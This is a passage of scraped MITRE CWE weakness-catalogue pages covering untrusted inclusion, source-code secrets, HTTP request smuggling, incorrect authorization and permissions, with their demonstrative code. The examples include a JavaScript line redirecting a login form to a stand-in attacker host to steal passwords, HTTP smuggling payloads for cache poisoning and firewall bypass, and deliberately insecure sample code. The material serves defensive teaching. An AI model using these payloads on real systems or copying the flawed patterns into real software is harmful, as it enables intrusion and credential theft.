weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-829: Inclusion of Functionality from Untrusted Control Sphere
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This login webpage includes a weather widget from an external website: (bad code)
Example Language: HTML
<div class="header"> Welcome!
<div id="loginBox">Please Login: </div><form id ="loginForm" name="loginForm" action="login.php" method="post"> </div>Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div>This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79). For example, user login information could easily be stolen with a single line added to weatherwidget.js: (attack code)
Example Language: JavaScript
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php"; This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
When including third-party functionality, such as a web widget, library, or other source of functionality, the product must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application.
CWE-540: Inclusion of Sensitive Information in Source Code
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterSource code on a web server or repository often contains sensitive information and should generally not be accessible to users.
There are situations where it is critical to remove source code from an area or server. For example, obtaining Perl source code on a system allows an attacker to understand the logic of the script and extract extremely useful information such as code bugs or logins and passwords.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses an include file to store database credentials: database.inc (bad code)
Example Language: PHP
<?php
$dbName = 'usersDB'; $dbPassword = 'skjdh#67nkjd3$3$'; ?> login.php (bad code)
Example Language: PHP
<?php
include('database.inc'); $db = connectToDB($dbName, $dbPassword); $db.authenticateUser($username, $password); ?> If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password. Example 2 The following comment, embedded in a JSP, will be displayed in the resulting HTML output. (bad code)
Example Language: JSP
<!-- FIXME: calling this with more than 30 args kills the JDBC server -->
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-615: Inclusion of Sensitive Information in Source Code Comments
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterWhile adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc.
An attacker who finds these comments can map the application's structure and files, expose hidden parts of the site, and study the fragments of code to reverse engineer the application, which may help develop further attacks against the site.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following comment, embedded in a JSP, will be displayed in the resulting HTML output. (bad code)
Example Language: JSP
<!-- FIXME: calling this with more than 30 args kills the JDBC server -->
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-830: Inclusion of Web Functionality from an Untrusted Source
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source.
Including third party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted. Even if the third party is a trusted source, the product may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the product. This weakness is common in "mashup" development on the web, which may include source functionality from other domains. For example, Javascript-based web widgets may be inserted by using '<SCRIPT SRC="http://other.domain.here">' tags, which causes the code to run in the domain of the product, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access. Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This login webpage includes a weather widget from an external website: (bad code)
Example Language: HTML
<div class="header"> Welcome!
<div id="loginBox">Please Login: </div><form id ="loginForm" name="loginForm" action="login.php" method="post"> </div>Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div>This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79). For example, user login information could easily be stolen with a single line added to weatherwidget.js: (attack code)
Example Language: JavaScript
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php"; This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product acts as an intermediary HTTP agent
(such as a proxy or firewall) in the data flow between two
entities such as a client and server, but it does not
interpret malformed HTTP requests or responses in ways that
are consistent with how the messages will be processed by
those entities that are at the ultimate destination.
HTTP requests or responses ("messages") can be malformed or unexpected in ways that cause web servers or clients to interpret the messages in different ways than intermediary HTTP agents such as load balancers, reverse proxies, web caching proxies, application firewalls, etc. For example, an adversary may be able to add duplicate or different header fields that a client or server might interpret as one set of messages, whereas the intermediary might interpret the same sequence of bytes as a different set of messages. For example, discrepancies can arise in how to handle duplicate headers like two Transfer-encoding (TE) or two Content-length (CL), or the malicious HTTP message will have different headers for TE and CL. The inconsistent parsing and interpretation of messages can allow the adversary to "smuggle" a message to the client/server without the intermediary being aware of it. This weakness is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following example, a malformed HTTP request is sent to a website that includes a proxy server and a web server with the intent of poisoning the cache to associate one webpage with another malicious webpage. (attack code)
POST http://www.website.com/foobar.html HTTP/1.1
Host: www.website.com Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 Content-Length: 54 GET /poison.html HTTP/1.1 Host: www.website.com Bla: GET http://www.website.com/page_to_poison.html HTTP/1.1 Host: www.website.com Connection: Keep-Alive When this request is sent to the proxy server, the proxy server parses the first four lines of the POST request and encounters the two "Content-Length" headers. The proxy server ignores the first header, so it assumes the request has a body of length 54 bytes. Therefore, it treats the data in the next three lines that contain exactly 54 bytes as the first request's body: (result)
GET /poison.html HTTP/1.1
Host: www.website.com Bla: The proxy then parses the remaining bytes, which it treats as the client's second request: (attack code)
GET http://www.website.com/page_to_poison.html HTTP/1.1
Host: www.website.com Connection: Keep-Alive The original request is forwarded by the proxy server to the web server. Unlike the proxy, the web server uses the first "Content-Length" header and considers that the first POST request has no body. (attack code)
POST http://www.website.com/foobar.html HTTP/1.1
Host: www.website.com Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 Content-Length: 54 (ignored by server) Because the web server has assumed the original POST request was length 0, it parses the second request that follows, i.e. for GET /poison.html: (attack code)
GET /poison.html HTTP/1.1
Host: www.website.com Bla: GET http://www.website.com/page_to_poison.html HTTP/1.1 Host: www.website.com Connection: Keep-Alive Note that the "Bla:" header is treated as a regular header, so it is not parsed as a separate GET request. The requests the web server sees are "POST /foobar.html" and "GET /poison.html", so it sends back two responses with the contents of the "foobar.html" page and the "poison.html" page, respectively. The proxy matches these responses to the two requests it thinks were sent by the client - "POST /foobar.html" and "GET /page_to_poison.html". If the response is cacheable, the proxy caches the contents of "poison.html" under the URL "page_to_poison.html", and the cache is poisoned! Any client requesting "page_to_poison.html" from the proxy would receive the "poison.html" page. When a website includes both a proxy server and a web server, some protection against this type of attack can be achieved by installing a web application firewall, or using a web server that includes a stricter HTTP parsing procedure or make all webpages non-cacheable. Additionally, if a web application includes a Java servlet for processing requests, the servlet can check for multiple "Content-Length" headers and if they are found the servlet can return an error response thereby preventing the poison page to be cached, as shown below. (good code)
Example Language: Java
protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
// Set up response writer object ... try {
// check for multiple content length headers
Enumeration contentLengthHeaders = request.getHeaders("Content-Length"); int count = 0; while (contentLengthHeaders.hasMoreElements()) { count++;
}
if (count > 1) {
// output error response
}
else {
// process request
Example 2 In the following example, a malformed HTTP request is sent to a website that includes a web server with a firewall with the intent of bypassing the web server firewall to smuggle malicious code into the system. (attack code)
POST /page.asp HTTP/1.1
Host: www.website.com Connection: Keep-Alive Content-Length: 49223 zzz...zzz ["z" x 49152] POST /page.asp HTTP/1.0 Connection: Keep-Alive Content-Length: 30 POST /page.asp HTTP/1.0 Bla: POST /page.asp?cmd.exe HTTP/1.0 Connection: Keep-Alive When this request is sent to the web server, the first POST request has a content-length of 49,223 bytes, and the firewall treats the line with 49,152 copies of "z" and the lines with an additional lines with 71 bytes as its body (49,152+71=49,223). The firewall then continues to parse what it thinks is the second request starting with the line with the third POST request. Note that there is no CRLF after the "Bla: " header so the POST in the line is parsed as the value of the "Bla:" header. Although the line contains the pattern identified with a worm ("cmd.exe"), it is not blocked, since it is considered part of a header value. Therefore, "cmd.exe" is smuggled through the firewall. When the request is passed through the firewall the web server the first request is ignored because the web server does not find an expected "Content-Type: application/x-www-form-urlencoded" header, and starts parsing the second request. This second request has a content-length of 30 bytes, which is exactly the length of the next two lines up to the space after the "Bla:" header. And unlike the firewall, the web server processes the final POST as a separate third request and the "cmd.exe" worm is smuggled through the firewall to the web server. To avoid this attack a Web server firewall product must be used that is designed to prevent this type of attack. Example 3 The interpretation of HTTP responses can be manipulated if response headers include a space between the header name and colon, or if HTTP 1.1 headers are sent through a proxy configured for HTTP 1.0, allowing for HTTP response smuggling. This can be exploited in web browsers and other applications when used in combination with various proxy servers. For instance, the HTTP response interpreted by the front-end/client HTTP agent/entity - in this case the web browser - can interpret a single response from an adversary-compromised web server as being two responses from two different web sites. In the Example below, notice the extra space after the Content-Length and Set-Cookie headers. (attack code)
HTTP/1.1 200 OK
Date: Fri, 08 Aug 2016 08:12:31 GMT Server: Apache (Unix) Connection: Keep-Alive Content-Encoding: gzip Content-Type: text/html Content-Length : 2345 Transfer-Encoding: chunked Set-Cookie : token="Malicious Code" <HTML> ... "Malicious Code" Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Theoretical
Request smuggling can be performed due to a multiple interpretation error, where the target is an intermediary or monitor, via a consistency manipulation (Transfer-Encoding and Content-Length headers).
CWE-863: Incorrect Authorization
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code could be for a medical records application. It displays a record to already authenticated users, confirming the user's authorization using a value stored in a cookie. (bad code)
Example Language: PHP
$role = $_COOKIES['role'];
if (!$role) { $role = getRole('user'); }if ($role) { // save the cookie to send out in future responses }setcookie("role", $role, time()+60*60*2); else{ ShowLoginScreen(); }die("\n"); if ($role == 'Reader') { DisplayMedicalHistory($_POST['patient_ID']); }else{ die("You are not Authorized to view this record\n"); }The programmer expects that the cookie will only be set when getRole() succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can easily set the "role" cookie to the value "Reader". As a result, the $role variable is "Reader", and getRole() is never invoked. The attacker has bypassed the authorization system. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.
CWE-276: Incorrect Default Permissions
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Hardware Design" (View-1194)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.19, this entry is
being considered for deprecation or significant
revision. Its name and description are inconsistent. The
name is more general, and the description is more
specific. The description emphasizes the installation
phase only; mentions only files; and emphasizes
modification of those files. The name applies to any type
of resource, does not mention the specific permissions,
and could be relevant to any SDLC phase.
CWE-303: Incorrect Implementation of Authentication Algorithm
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe requirements for the product dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-732: Incorrect Permission Assignment for Critical Resource
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.
When a resource is given a permission setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution, or sensitive user data. For example, consider a misconfigured storage account for the cloud that can be read or written by a public or anonymous user.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code sets the umask of the process to 0 before creating a file and writing "Hello world" into the file. (bad code)
Example Language: C
#define OUTFILE "hello.out"
umask(0); FILE *out; /* Ignore link following (CWE-59) for brevity */ out = fopen(OUTFILE, "w"); if (out) { fprintf(out, "hello world!\n"); }fclose(out); After running this program on a UNIX system, running the "ls -l" command might return the following output: (result)
-rw-rw-rw- 1 username 13 Nov 24 17:58 hello.out
The "rw-rw-rw-" string indicates that the owner, group, and world (all users) can read the file and write to it. Example 2 This code creates a home directory for a new user, and makes that user the owner of the directory. If the new directory cannot be owned by the user, the directory is deleted. (bad code)
Example Language: PHP
function createUserDir($username){
$path = '/home/'.$username; }if(!mkdir($path)){ return false; }if(!chown($path,$username)){ rmdir($path); }return false; return true; Because the optional "mode" argument is omitted from the call to mkdir(), the directory is created with the default permissions 0777. Simply setting the new user as the owner of the directory does not explicitly change the permissions of the directory, leaving it with the default. This default allows any user to read and write to the directory, allowing an attack on the user's files. The code also fails to change the owner group of the directory, which may result in access by unexpected groups. This code may also be vulnerable to Path Traversal (CWE-22) attacks if an attacker supplies a non alphanumeric username. Example 3 The following code snippet might be used as a monitor to periodically record whether a web site is alive. To ensure that the file can always be modified, the code uses chmod() to make the file world-writable. (bad code)
Example Language: Perl
$fileName = "secretFile.out";
if (-e $fileName) { chmod 0777, $fileName; }my $outFH; if (! open($outFH, ">>$fileName")) { ExitError("Couldn't append to $fileName: $!"); }my $dateString = FormatCurrentTime(); my $status = IsHostAlive("cwe.mitre.org"); print $outFH "$dateString cwe status: $status!\n"; close($outFH); The first time the program runs, it might create a new file that inherits the permissions from its environment. A file listing might look like: (result)
-rw-r--r-- 1 username 13 Nov 24 17:58 secretFile.out
This listing might occur when the user has a default umask of 022, which is a common setting. Depending on the nature of the file, the user might not have intended to make it readable by everyone on the system. The next time the program runs, however - and all subsequent executions - the chmod will set the file's permissions so that the owner, group, and world (all users) can read the file and write to it: (result)
-rw-rw-rw- 1 username 13 Nov 24 17:58 secretFile.out
Perhaps the programmer tried to do this because a different process uses different permissions that might prevent the file from being updated. Example 4 This program creates and reads from an admin file to determine privilege information. If the admin file doesn't exist, the program will create one. In order to create the file, the program must have write privileges to write to the file. After the file is created, the permissions need to be changed to read only. (bad code)
Example Language: Go
const adminFile = "/etc/admin-users"
func createAdminFileIfNotExists() error {
